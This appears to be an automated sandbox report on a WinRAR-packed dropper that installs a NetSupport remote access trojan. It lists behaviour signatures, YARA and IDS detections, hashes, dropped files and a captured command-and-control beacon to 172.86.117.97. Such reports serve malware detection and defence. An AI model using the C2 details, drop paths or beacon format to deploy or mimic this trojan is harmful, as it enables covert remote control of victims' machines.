Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1546257
MD5:87514bcfa421057dc1575ec1630d78ff
SHA1:012029171ff901f1cb5495059da47143d193923c
SHA256:50c263fc02412062ca239e7419880678f797408a243d0a2140bc7bbb96a716c1
Tags:exeuser-Bitsight
Infos:

Detection

NetSupport RAT
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionalty to change the wallpaper
Delayed program exit found
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • file.exe (PID: 6604 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 87514BCFA421057DC1575EC1630D78FF)
    • bild.exe (PID: 5732 cmdline: "C:\Users\Public\Netstat\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\Public\Netstat\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\Public\Netstat\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\Public\Netstat\bild.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\Public\Netstat\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\Public\Netstat\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000002.00000002.3888318749.0000000000262000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000002.00000002.3890657665.000000006E0C0000.00000002.00000001.01000000.0000000E.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 9 entries
                      SourceRuleDescriptionAuthorStrings
                      2.2.bild.exe.6fbb0000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        2.0.bild.exe.260000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          2.2.bild.exe.260000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            2.2.bild.exe.6f9d0000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              2.2.bild.exe.111b79e0.2.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                                Click to see the 6 entries

                                System Summary

                                barindex
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Netstat\bild.exe" , CommandLine: "C:\Users\Public\Netstat\bild.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Netstat\bild.exe, NewProcessName: C:\Users\Public\Netstat\bild.exe, OriginalFileName: C:\Users\Public\Netstat\bild.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6604, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\Public\Netstat\bild.exe" , ProcessId: 5732, ProcessName: bild.exe
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 172.86.117.97, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Netstat\bild.exe, Initiated: true, ProcessId: 5732, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-31T17:06:03.056875+010020229301A Network Trojan was detected20.109.210.53443192.168.2.549706TCP
                                2024-10-31T17:06:41.336373+010020229301A Network Trojan was detected20.109.210.53443192.168.2.549907TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-31T17:05:40.883894+010028277451Malware Command and Control Activity Detected192.168.2.549704172.86.117.97443TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: C:\Users\Public\Netstat\bild.exeReversingLabs: Detection: 28%
                                Source: C:\Users\Public\Netstat\remcmdstub.exeReversingLabs: Detection: 13%
                                Source: file.exeReversingLabs: Detection: 52%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 88.6% probability
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,2_2_110AD570
                                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\Netstat\msvcr100.dllJump to behavior
                                Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: Binary string: msvcr100.i386.pdb source: file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000002.00000002.3890464582.000000006D021000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000002.00000002.3890900771.000000006FBB2000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000002.00000002.3890657665.000000006E0C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000002.00000002.3888318749.0000000000262000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000002.00000000.2041890788.0000000000262000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000002.00000002.3890657665.000000006E0C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000002.00000002.3890806531.000000006F9D5000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.0.dr
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAB40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF75AAB40BC
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AACB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF75AACB190
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AADFCA0 FindFirstFileExA,0_2_00007FF75AADFCA0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,2_2_1102D330
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,2_2_11065890
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,2_2_1106A0A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,2_2_111266E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,2_2_1110AFD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_6D080F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,2_2_6D080F84
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_6D07EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,2_2_6D07EFE1

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.5:49704 -> 172.86.117.97:443
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 172.67.68.212 172.67.68.212
                                Source: Joe Sandbox ViewASN Name: QUICKPACKETUS QUICKPACKETUS
                                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49706
                                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49907
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.86.117.97
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.86.117.97
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.86.117.97
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://172.86.117.97/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 172.86.117.97Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: bild.exe, bild.exe, 00000002.00000002.3890657665.000000006E0C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: bild.exe, bild.exe, 00000002.00000002.3890657665.000000006E0C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htm
                                Source: bild.exe, 00000002.00000002.3890657665.000000006E0C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: bild.exe, bild.exe, 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1
                                Source: file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: bild.exe, 00000002.00000003.2343699674.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3888424181.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: bild.exe, 00000002.00000002.3888424181.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp/
                                Source: bild.exe, 00000002.00000002.3888424181.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSX
                                Source: file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                Source: file.exe, 00000000.00000003.2039840028.0000027C55C7D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: file.exe, 00000000.00000003.2039840028.0000027C55C7D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s2.symcb.com0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                Source: file.exe, 00000000.00000003.2039840028.0000027C55C7D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: file.exe, 00000000.00000003.2039840028.0000027C55C7D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: file.exe, 00000000.00000003.2039840028.0000027C55C7D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcd.com0&
                                Source: file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                Source: file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: file.exe, 00000000.00000003.2039840028.0000027C55C7D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: file.exe, 00000000.00000003.2039840028.0000027C55C7D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: file.exe, 00000000.00000003.2039840028.0000027C55C7D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: file.exe, 00000000.00000003.2039840028.0000027C55C7D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: remcmdstub.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,2_2_1101F6B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,2_2_1101F6B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,2_2_11032EE0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,2_2_110321E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,2_2_110076F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,2_2_11113880
                                Source: Yara matchFile source: 2.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.file.exe.27c55aa6820.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6604, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 5732, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,2_2_111158B0
                                Source: C:\Users\Public\Netstat\bild.exeProcess Stats: CPU usage > 49%
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAAC2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF75AAAC2F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,2_2_1115DB40
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,2_2_1102D330
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAAF9300_2_00007FF75AAAF930
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAB49280_2_00007FF75AAB4928
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAC1F200_2_00007FF75AAC1F20
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAA5E240_2_00007FF75AAA5E24
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AACCE880_2_00007FF75AACCE88
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AABA4AC0_2_00007FF75AABA4AC
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAC34840_2_00007FF75AAC3484
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AACB1900_2_00007FF75AACB190
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAD07540_2_00007FF75AAD0754
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAC4B980_2_00007FF75AAC4B98
